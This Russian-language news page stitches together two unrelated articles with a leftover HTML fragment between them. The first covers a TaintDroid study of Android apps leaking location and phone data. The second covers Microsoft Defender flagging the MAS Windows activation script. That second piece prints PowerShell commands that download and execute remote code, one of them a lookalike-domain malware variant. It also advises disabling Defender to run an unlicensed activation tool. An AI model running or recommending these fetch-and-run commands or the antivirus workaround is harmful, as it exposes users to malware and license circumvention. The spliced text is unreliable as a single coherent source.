Два из трех Android-приложений шпионят за пользователями

Два из трех Android-приложений шпионят за пользователями

Исследователи из государственного университета Пенсильвании, университета Дьюка и лаборатории Intel Labs обнаружили, что две трети приложений для операционной системы Android отслеживали набираемые пользователями номера, собирали сведения о географическом позиционировании телефона и осуществляли другую "подозрительную" активность по отношению к персональным сведениям. Встроенную систему защиты ОС Android ученые назвали неэффективной и не позволяющей в полной мере защитить важную информацию.

Для проведения исследований из наиболее популярной части ассортимента Android Market были в случайном порядке отобраны 30 приложений, требующих доступа к личным данным пользователя; выполняемые над этими сведениями операции подверглись пристальному изучению. В итоге выяснилось, что 15 программ отправляют геолокационную информацию рекламным компаниям, а еще 7 передают идентификатор устройства или телефонный номер владельца на посторонние сервера. При этом практически все без исключения проанализированные продукты никак не информировали пользователя о своей активности, хотя в некоторых случаях сведения о нем отправлялись контрагенту каждые 30 секунд.

Итоги исследования отчетливо показали: владельцы Android-устройств могут вообще не подозревать о том, что происходит с хранящимися на их телефонах ценными сведениями после установки любого из 70 тыс. приложений, доступных в Android Market. Google поспешил указать, что перед установкой пользователю отображается уведомление о возможном использовании программой тех или иных персональных данных; тем не менее, исследователи подчеркнули: знать, на что в принципе способно программное обеспечение - это одно, а быть осведомленным о том, какие операции оно выполняет в действительности - совсем другое.

"Выявленные факты демонстрируют, что примитивный контроль доступа в операционной системе Android не способен обеспечить полноценной защиты от третьесторонних приложений, собирающих персональные данные", - говорится в работе, которая будет официально представлена на октябрьском симпозиуме Usenix по вопросам разработки и внедрения операционных систем. - "К примеру, разрешая программному продукту получить доступ к сведениям о географическом позиционировании, пользователь не знает и не может узнать, отправит ли приложение эту информацию рекламным агентам, своим разработчикам, или кому угодно другому".

Представитель Google сказал по этому поводу, что пользователям следует устанавливать только те приложения, которым они доверяют, и что подозрительные программы могут быть удалены из системы в любой момент. Тем не менее, в заявлении не содержалось никакой информации о том, на основании чего владелец устройства с Android может принять обоснованное решение о доверенности или недоверенности продукта.

Справедливости ради стоит заметить: неизвестно, какие операции могут позволить себе приложения на конкурирующих платформах. Ученые смогли отследить активность Android-программ только потому, что ОС от Google относится к системам с открытым кодом; это позволило создать инструмент для мониторинга важных и конфиденциальных данных, названный TaintDroid. Не исключено, что продукты для Apple iPhone или для RIM BlackBerry при аналогичной проверке показали бы похожие результаты.

Исследователи отказались назвать наименования приложений, изученных ими, и не выразили намерения сделать TaintDroid общедоступным. Соответственно, владельцам Android-устройств по-прежнему остается лишь верить в добропорядочность разработчиков программных продуктов.

The Register

" />

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru